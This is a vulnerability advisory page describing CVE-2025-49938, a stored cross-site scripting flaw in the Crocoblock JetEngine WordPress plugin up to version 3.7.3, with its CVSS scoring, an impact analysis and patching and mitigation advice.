CVE-2025-49938

MEDIUM
2025-10-22 [email protected]
WordPress PHP XSS
6.5
CVSS 3.1
Share

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
Low

Lifecycle Timeline

2
Analysis Generated
Apr 01, 2026 - 15:22 vuln.today
CVE Published
Oct 22, 2025 - 15:15 nvd
MEDIUM 6.5

DescriptionNVD

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetEngine jet-engine allows Stored XSS.This issue affects JetEngine: from n/a through <= 3.7.3.

AnalysisAI

Stored XSS in Crocoblock JetEngine WordPress plugin versions 3.7.3 and earlier allows authenticated users with limited privileges to inject malicious scripts that execute in the browsers of other users, including administrators. The vulnerability requires user interaction (UI:R) to trigger and affects confidentiality, integrity, and availability with limited scope. With EPSS at 0.07% and no KEV status indicating active exploitation, this represents a low-probability but real risk requiring patching in multi-user WordPress environments.

Technical ContextAI

JetEngine is a WordPress plugin built on the Crocoblock platform that provides dynamic content and element management capabilities. The vulnerability exists in the web page generation process where user-supplied input is not properly neutralized before being rendered in HTML context, violating the CWE-79 Improper Neutralization of Input During Web Page Generation classification. The CVSS vector indicates network-based attack vector with low complexity and low privilege requirements (PR:L), meaning any logged-in user can craft a payload. The vulnerability persists in stored form, affecting all subsequent page views until remediated, making it dangerous in shared editing environments.

Affected ProductsAI

Crocoblock JetEngine WordPress plugin versions from unspecified origin through 3.7.3 inclusive are affected. The plugin is available via the WordPress plugin repository (referenced via patchstack.com database entry for wordpress-jetengine-plugin). All installations running version 3.7.3 or earlier are vulnerable; users should verify their installed version in WordPress plugin settings.

RemediationAI

Update Crocoblock JetEngine to the patched version released after 3.7.3. The patchstack.com vulnerability report indicates the issue affects versions through 3.7.3, implying a fix exists in a later release; check the official Crocoblock JetEngine changelog or WordPress plugin page for the specific patched version number. Until patching is possible, restrict editor and contributor role assignments to trusted users only, and implement content moderation workflows requiring administrative approval before live publication. Audit existing site content for suspicious script tags using WordPress security plugins like Wordfence.

Share

CVE-2025-49938 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy